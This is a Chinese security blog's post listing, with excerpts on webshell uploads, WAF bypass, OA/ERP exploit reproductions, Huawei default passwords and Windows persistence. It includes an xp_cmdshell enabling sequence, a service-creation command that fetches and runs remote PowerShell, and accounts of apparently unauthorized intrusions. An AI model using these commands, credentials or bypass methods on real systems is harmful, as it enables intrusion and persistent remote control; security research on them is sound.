- 博客(59)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 .Net网站webshell 401?403?D盾拦截?一招内存马直接搞定
在参加某次公司项目时,在碰到一个.NEt的通用系统,通过审计发现了两个文件上传漏洞,网站管理员发现网站被上传webshell后,最开始是修改了网站的配置文件,导致脚本文件禁止执行,后来通过上传web.config的方式给绕过了,但是后面管理员又给服务器装了D盾,安全狗,天擎,导致上传的文件无法正常解析,尝试了各种免杀的aspx马,都是提示禁止执行脚本文件,最后通过加载内存马的方式绕过了D盾的检测。
2024-01-31 11:04:52
1910
原创 文件上传绕过的一次思路总结(两个上传点组合Getshell)
这是朋友的一个渗透测试的项目,有个上传的黑名单,我就试了一下,本文章是一遍测试一遍记录的,对于一些知识点总结的不全,只是提供了一个渗透中碰到上传的思路,文章无排版,是笔记的形式做记录。......
2022-06-21 01:16:02
2781
2
原创 网站克隆工具-httrack安装使用教程
1、安装sudoapt-get isntall httarck2、启动httrackcd 到一个文件夹启动 httrack-*.gif +www.*.com/*.zip -*img_*.zip之后一路回车就行了,httrack会爬取所有网站的js文件以及图片保存到相应的文件夹中3、克隆完成过一会提示Done.KThanks for using HTTrack!说明克隆完成切换到项目文件夹,发现网站的所有文件都保存在文件夹中了..
2022-04-13 10:40:42
5511
2
原创 HUAWEI华为设备各产品系列弱口令大全
产品系列/名称 版本号 BootROM(密码) Console(用户名/密码) Telnet(用户名/密码) Web(用户名/密码) 备注 AntiDDoS1500 V100R001 O&m15213 admin/Admin@123 admin/Admin...
2022-04-13 10:36:04
4126
原创 渗透实战-JSP上传webshell报错500
从毕业到现在接近3年了,也是终于迈出了跳槽的一步,本身不是很想跳槽,但是各种原因吧,还是跟上家公司说拜拜了,呆了2年多,进步了很多,感谢上家提供的平台,这篇故事发生在我入职新公司的第一天,上家公司我的一位组员,找到我,感觉这个可以学习一下,主要是一个渗透思路问题。懒得打字了,上传的地方就大约是这个情况 ,看聊天聊天记录吧,大概就是可以上传webshell,但是报错下班后回家做了一顿饭,因为是跟xe合租的房子,他对象出去有事,只能我亲自下厨,因为是刚搬过来,没有锅盖,直接起锅烧油...
2022-04-11 22:22:00
1891
5
原创 代码审计-靠网速的上传
本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任前几天xe给了一套系统的源码,搭到本地审计了一下,大多数都是后台的漏洞,注入什么的,但是我在全局索引上传的时候,索引到了一个TEST上传的接口,不知道是不是开发在写代码的时候测试用的忘记删除了,前台确实没有找到调用这个的地方,如果不看源码,这个上传黑盒是测试不出来的,由于功能点比较简单,也没什么写的,简单记录一下,就不排版了看到源码目录下有个名叫TES.
2022-03-13 04:37:38
1254
原创 代码执行和命令执行漏洞小记
代码执行漏洞由于开发人员编写源码,没有针对代码中可执行的特殊函数入口做过滤,导致客户端可以提交恶意构造语句提交,并交由服务器端执行。命令注入攻击中WEB服务器没有过滤类似system(),eval(),exec()等函数是该漏洞攻击成功的最主要原因。代码执行漏洞本质PHP代码执行漏洞可以将代码注入到应用中,最终到webserver去执行,用了相关函数、却存在可以控制的变量。代码执行产生的函数eval()preg_replace()create_function()assert() arr
2021-10-24 21:51:58
2866
原创 Windows系统命令查看硬件信息
wmic memorychip list brief 或者 wmic MEMPHYSICAL list brief 就会看到内存条的数量rem 查看cpuwmic cpu list briefrem 查看物理内存wmic memphysical list briefrem 查看逻辑内存wmic memlogical list briefrem 查看缓存内存wmic memcache list briefrem 查看虚拟内存wmic pagefile list brie
2021-10-24 21:42:21
940
原创 挖洞小记-不出网的Ueditor
也是好久没有刷洞了,上个月趁活动寥寥草草交了几个洞,不是很满意,并没有达到预期的目标,这个月准备冲个榜,然后就碰到了一个ueditor的上传漏洞,不了解这个洞的参考UEditor .net版本任意文件上传_Azjj-CSDN博客为什么要记录一下呢,是因为之前在某次HW的时候也碰到过这个情况,但是很遗憾,没有利用成功,这次终于又碰到了,正好记录一下。是这样的,一般的ueditor的上传漏洞都是从自己服务器上远程下载一个文件到自己服务器,但是有些服务器会有不出网的情况,就是访问不到要远程下载的文件.
2021-09-09 20:38:17
778
3
原创 Druid未授权漏洞实战利用
本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任0x00 前言最近一直想更一篇实战的文章,距离上篇文章已经过去5个月了,上个月本来是想更一个湾湾大学的内网实战的,但是奈何搞到一半被管理员发现了,所控的服务器全部下线了,也就没再弄下去,此文章是在某SRC的某个企业的渗透实战,干货不是很多,但是相信对你的实战思路绝对是有帮助的。0x01Druid未授权漏洞发现对于Druid未授权访问,直接用扫描工具就可.
2021-08-30 10:28:16
10608
原创 防守者的角度来看攻击
0x01前言之前一直没做过防守,也不是没做过,而是没有做过比较正式的防守,在客户的一次HW前的演习活动中,有幸被派去做了防守的工作,虽然感觉相对于攻击队来说是比较划水的,但是还是比较有收获的。能了解到在攻击者在攻击的时候,防守这边的视角。0x02 看似风平浪静,实质暗潮涌动 盯着一天的防护设备日志,不断刷新,偶尔会弹出几个国外的ip东打一枪,西打一枪,会听到旁边的人说这攻击队真菜,一直到白天防守工作结束,防守方收拾好电脑,攻击队的獠牙已经漏了出来,确实,这个我是深有体会的,我...
2021-03-22 15:27:44
425
原创 某大学多站联动获取webshell
0x00前言前面大体概括一下获取webshell的一个思路,此服务器存在三个系统,利用第一个系统获取到了老师以及学生的学号,其他的没有什么价值的信息,虽然存在文件上传,但是上传的文件目录不是在web目录底下的,后来通过连接了webshell也证实了这一点,利用收集到的老师以及学生信息,成功登录了第二个系统,第二个系统学生登录后处存在上传,但是没有路径,并且不能访问到上传的文件,老师登录可以下载到学生上传的文件,通过抓包可以枚举所有目录以及文件,后来通过枚举发现此处的上传点也不在网站根目录下,然后回到学生
2021-01-26 22:22:57
758
2
原创 一次IT运维管理系统的权限获取
0x00前言闲来无事,网上一朋友发来一个BC的站,在别的端口发现IT运维系统的弱口令,类似于那种网络设备的管控系统,里面存在着几十台路由器,交换机,还有两台服务器,看看能不能getshell。0x01尝试远程连接选择了一台服务器,进入管理系统,点击远程桌面,难道就这么简单的连接上了吗?那肯定不会的,要是直接连接我也不会来水这篇文章了,连接远程桌面,弹了个空白页面,以为浏览器问题,换了个浏览器也是无果telent也是无果0x02执行脚本文件运维系统一般都会有计划任务的功
2021-01-12 14:20:52
476
原创 Bypass WAF实战总结
0X00前言上个月刷了一波洞,然后这个月初远程支持了一个HW,在文件上传getshell的时候,碰到个各式各样的云waf,通过一个月的实战,总结了几个比较实用的技巧,文章总结的不全,只是基于我实战中用到的一些方法。0x01垃圾填充这是众所周知、而又难以解决的问题。如果HTTP请求POST 太大,检测所有的内容,WAF集群消耗太大的CPU、内存资源。因此许多WAF只检测前面的几K字节、1M、或2M。对于攻击者而然,只需要在前面添加许多无用数据,把攻击payload放在最后即可绕过WAF检测。1
2021-01-09 17:07:53
2749
1
原创 Axis2 弱口令 getshell 漏洞复现
Axis2Axis2是下一代 Apache Axis。Axis2 虽然由 Axis 1.x 处理程序模型提供支持,但它具有更强的灵活性并可扩展到新的体系结构。Axis2 基于新的体系结构进行了全新编写,而且没有采用 Axis 1.x 的常用代码。支持开发 Axis2 的动力是探寻模块化更强、灵活性更高和更有效的体系结构,这种体系结构可以很容易地插入到其他相关 Web 服务标准和协议(如 WS-Security、WS-ReliableMessaging 等)的实现中默认后台:http://ip:p
2021-01-05 14:59:18
2275
原创 流量分析与日志溯源的个人理解
下面是我结合网上论坛以及个人的一些想法针对日志分析溯源的个人理解现阶段大部分企业都会上日志审计设备,在配上流量分光,还有各类IDS、WAF等设备日志,对安全溯源分析十分方便,但在日常工作中,免不了要直接看服务器相关请求日志的情况,这个时候就需要我们自身具备日志分析的能力了。一、日志分析流程 1、统计 首先需要对数据进行处理,如请求IP统计,访问地址统计,HTTP状态码统计等,这些数据统计可以使用excel或者python脚本,如果手头有各类工具那就更容易统计了。2、威胁发现关键字过...
2020-12-09 11:36:44
4011
1
原创 最新用友NC6.5文件上传漏洞
0x00漏洞公告用友NC产品文件上传的漏洞,恶意攻击者可以通过该漏洞上传任意文件,从而可能导致获取到目标系统管理权限,目前,官方暂未发布补丁公告,建议使用该产品用户及时关注官方安全漏洞公告和补丁更新动态。0x01影响范围用友NC远程代码执行漏洞影响版本:NC6.5之后版本。0x02漏洞描述根据分析,漏洞为文件上传漏洞,在无需登陆系统的情况下,通过某接口直接上传文件,恶意攻击者成功利用该漏洞可获得目标系统管理权限,系统如果直接暴露在互联网上风险较大,建议及时排查。0x03 漏洞exp
2020-12-09 10:30:10
10023
7
原创 马氏五连鞭EduSrc漏洞挖掘
0x00前言最近是大事没有,小事不断,被调遣到客户单位做HW蓝方,没啥意思,整天盯着防护设备等待告警,正好一王者大佬最近在挖EduSrc,让帮着搞一搞,在50星荣耀王者的诱惑下,我准备开启我的EduSrc之旅。0x01 年轻人不讲武德通过对某个大学的C段扫描,扫到了一个学生管理系统简单测试了一下,发现抓包验证码不刷新,而且会提示“用户名不存在”,这里就可以进行账号密码的爆破。很显然,我的百万大字典不配爆破,这网站不讲武德,放弃爆破。0x02 偷袭通过目录扫描,扫描到未
2020-12-07 21:04:36
4089
9
转载 红队人员实战手册
红队人员实战手册 声明本文转载于klionsec的github 感觉写的挺好,分享一下分享初衷 一来, 旨在为 "攻击" / "防御"方 提供更加全面实用的参考 还是那句老闲话 "未知攻焉知防", 所有单纯去说 "攻" 或者 "防" 的都是耍流氓, 攻守兼备才能把路越走越宽 二来, 也是为秉承共享协作, 希望能为 红队 及 部分实战攻防研究人员 做出自己应有的贡献 个人一直坚信, 真正的价值来源于实实在在的奉献,与其天天到处嘴炮,不如静下心来多反思下...
2020-11-30 22:46:05
1382
原创 Windows下利用For命令查找&写入文件
Windows下利用For命令查找&写入文件因为之前老是碰到过反弹shell的机器,但是文件太多,找不到具体的网站目录,Linux服务器用Find命令很方便,而Windows命令下其实用For命令也能达到相应的效果格式:for /r 目录名 %i in (匹配模式1,匹配模式2) do @echo %i其实For命令的用法特别多,下面平时在渗透过程中常用的一些方法例:查找C盘牡目录下txt格式的文件for /r c:/ %i in (*.txt) do @ech.
2020-11-30 22:34:00
897
原创 Windows远控之权限维持
Windows权限维持一丶建立系统服务获得了管理员的权限可以选择建立系统服务来进行持久控制,会被杀软拦截。1、使用sc命令建立系统服务,可以选择执行上传的木马,或者powershell远程执行。sc create "nuoyan" binpath= "c:\accc.exe"sc create "主动防御" binpath= "cmd /c start powershell.exe IEX (new-object net.webclient).downloadstring('http:/
2020-11-23 21:02:39
1271
原创 UEditor .net版本任意文件上传
UEditor .net版本任意文件上传简介ueditor是百度官方技术团队开发的一套前端编辑器,可以上传图片,写文字,支持自定义的html编写,移动端以及电脑端都可以无缝对接,自适应页面,图片也可以自动适应当前的上传路径与页面比例大小,一些视频文件的上传,开源,高效,稳定,安全,一直深受站长们的喜欢。百度的UEditor文本编辑器,近几年很少被曝出漏洞,事情没有绝对的,总会有漏洞,这次被曝出的漏洞是.net版本的,其他的php,jsp,asp版本不受此UEditor的漏洞的影响,.net存
2020-11-22 14:54:32
1019
原创 通过SQLserver执行系统命令
SQLserver执行命令方法一:xp_cmdshellexec master..xp_cmdshell "whoami"默认执行是关闭EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;将1修改为0则为关闭xp_cmdshell 被删除可采用xplog70.dll恢复Exec master.dbo.sp_addex...
2020-11-22 14:40:57
1698
原创 各行业漏洞测试项
互联网行业 通用业务模块 业务逻辑漏洞 登陆 暴力破解用户名密码 撞库 验证码爆破和绕过 手机号撞库 账户权限绕过 注册 恶意用户批量注册 恶意验证注册账户 存储型XSS 密码找回 重置任意用户账户密码 ...
2020-11-22 14:31:42
504
1
原创 通过CMD查询远程连接端口及开启远程连接端口的方法
一、CMD查询远程连接端口1.tasklist /svc | find "Ter"(查找远程连接的PID)2.netstat -ano | find "1352"(通过PID值查找开放的端口)二、开启远程连接端口win08,三条命令即可:wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconne
2020-11-22 14:25:52
6085
原创 Windows本地认证 NTLM Hash&LM Hash
自己一直对一些底层的原理欠缺,最近一段时间弥补了一些基础的东西,但是一直没做记录。Windows的一个登录验证是必须要了解的,这里简单做个笔记记录一下。Windows本地认证 NTLM Hash&LM Hash概括Windows本地认证采用sam hash比对的形式来判断用户密码是否正确,计算机本地用户的所有密码被加密存储在%SystemRoot%\system32\config\sam文件中,当我们登录系统的时候,系统会自动地读取SAM文件中的“密码”与我们输入的密码进行比对,如果.
2020-11-21 01:33:26
1849
原创 漏洞挖掘之资产收集(信息收集)
漏洞挖掘之资产收集(信息收集)写在前忘了是在哪里看的一句话了,渗透测试的本质就是信息收集,确实,不管是渗透测试还是一些红蓝对抗中,都是一个信息收集的过程。之前也在跟一些面试的同志聊过关于信息收集的东西,千篇一律的回答就是那些东西,不管是在SRC众测还是攻防演练中,在拿到一个主站域名后,想从主站做入口进入到业务内网是很难的,或者说是不太现实的一件事,毕竟大多数的企业官网都是用的很成熟的框架,并且每天都会接受成千上万次的洗礼,能从主站拿到点东西第一是浪费事件,第二是难度太大,所以这里就体现出了信息收集
2020-11-18 15:41:07
4640
1
原创 漏洞挖掘-Google常用黑客语法
intext:这个就是把网页中的正文内容中的某个字符做为搜索条件.例如在google里输入:intext:情义.将返回所有在网页正文部分包含"情义"的网页.allintext:使用方法和intext类似.intitle:和上面那个intext差不多,搜索网页标题中是否有我们所要找的字符.例如搜索:intitle:情义.将返回所有网页标题中包含"情义"的网页.同理allintitle:也同intitle类似.cache:搜索google里关于某些内容的缓存,有时候也许能找到一些好东西哦
2020-11-13 12:44:51
1576
原创 记录一次企业官网被挂马的排查过程
事情发生在一个月前的晚上,因为领导下令了,客户网站被挂马,跳转bc页,影响比较大,刚打完王者农药的我默默的关闭了手机,开启了我的花呗分期的电脑。问题描述访问站点只要后面目录带Fkj(不管是文件还是目录),就会判断请求头,如果为手机移动端的请求头,就会跳转博彩网站,如果是电脑浏览器,就会弹空白页访问站点只要后面目录带Fkj(不管是文件还是目录),就会判断请求头,如果为手机移动端的请求头,就会跳转博彩网站,如果是电脑浏览器,就会弹空白页排查过程初步判断可能被修改js文件,但是翻...
2020-11-06 13:57:43
969
2
原创 weblogic未授权命令执行(CVE-2020-14882)
weblogic未授权命令执行(CVE-2020-14882)前言因为最近太忙了,各种文档之类的乱七八糟的事,对于刚爆的weblogic未授权,fofa上找了几个国外的站测了一下,正好今天没什么事,打算写个文章记录一下0x00 漏洞介绍未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。0x01影响版本 Oracle Weblogic Server 10.3.6.0.0 Ora...
2020-11-06 13:32:37
1106
原创 批量挖sql注入漏洞
这是去年我写的一篇文章,眼看着服务器马上到期了,也没有备份,直接复制过来了,也懒得改格式了,适合新手刷洞,将就看吧文章很水,但是很实在。关于批量挖sql注入,其实很简单,之前我在补天提交漏洞的时候,曾经在往常查阅了以下关于批量挖SQL注入的文章,其实没几个,无非就是告诉你用谷歌关键词之类的,但是搜索出来的站点挨个测试,太费时间和精力,效率太低这里我就讲一下怎么用最省力的方式批量刷sql注入的站点第一这里需要几个工具①7KBscan 爬虫机器人 (爬虫工具,种类很多,也可以自己写)②批量检测.
2020-10-08 19:55:04
3975
3
原创 PHP爆绝对路径方法
1、单引号爆路径说明:直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。www.xxx.com/news.php?id=149′2、错误参数值爆路径说明:将要提交的参数值改成错误值,比如-1。-99999单引号被过滤时不妨试试。www.xxx.com/researcharchive.php?id=-13、Google爆路径说明:结合关键字和site语法搜索出错页面的网页快照,常见关键字有warning和fatal error。注意,如果目标站点
2020-10-06 11:30:15
1100
原创 PhpStudy_pro小皮最新版本nginx 默认存在任意文件解析漏洞
0x00 前言先给小皮介绍下:phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等。我记得我可爱的Taoing在前段时间给我说过这个洞,因为是小皮(phpstudy_pro)默认自带的测试版本,也就是nginx 1.15.11 ,所以说如果用小皮搭建的系统,不变化nginx版.
2020-10-06 11:21:31
619
原创 泛微OA云桥 未授权任意文件读取
0x00 漏洞描述泛微云桥(e-Bridge)是上海泛微公司在”互联网+”的背景下研发的一款用于桥接互联网开放资源与企业信息化系统的系统集成中间件。泛微云桥存在任意文件读取漏洞,攻击者成功利用该漏洞,可实现任意文件读取,获取敏感信息。0x01 影响版本2018-2019 多个版本。0x02 漏洞复现第一步:/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt,在返回包有id字符串第
2020-10-06 11:19:37
1733
原创 用友GRP-u8 XXE 漏洞复现
0x00 漏洞描述用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。0x01 漏洞利用条件无需登录0x02 漏洞复现POC:POST /Proxy HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)Host: localhostContent-Length:.
2020-10-06 11:18:47
1126
原创 通达OA 11.5 SQL注入漏洞复现
0x00 漏洞描述通达OA 11.5存在sql注入0x01 漏洞影响版本通达oa 11.50x02 漏洞复现1、下载通达OA 11.5https://cdndown.tongda2000.com/oa/2019/TDOA11.5.exe,点击安装2、创建一个普通账户test:test1234563.1、id参数存在sql注入利用条件:一枚普通账号登录权限,但测试发现,某些低版本也无需登录也可注入参数位置:/general/appbuilder/web/re..
2020-10-06 11:17:26
1113
1
原创 通达OA 11.7 后台sql注入getshell漏洞复现
0x00 漏洞描述通达OA 11.7存在sql注入0x01 漏洞影响版本通达oa 11.7利用条件:需要账号登录0x02 漏洞复现1、下载通达OA 11.7,https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe,点击安装2、condition_cascade参数存在布尔盲注POC:GET /general/hr/manage/query/delete_cascade.php?condition_cascade=se...
2020-10-06 11:15:45
668
原创 通达OA 任意文件上传+文件包含导致RCE
0x00 漏洞描述ispirit/im/upload.php存在绕过登录(任意文件上传漏洞),结合gateway.php处存在的文件包含漏洞,最终导致getshell,或者直接利用日志文件写入shell,然后结合文件包含漏洞getshell0x01 漏洞影响版本通达OA V11版 <= 11.3 20200103 通达OA 2017版 <= 10.19 20190522 通达OA 2016版 <= 9.13 20170710 通达OA 2015版 <= 8.15 .
2020-10-06 11:14:48
2183
1
用友NC任意文件上传漏洞利用工具
2022-04-14
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人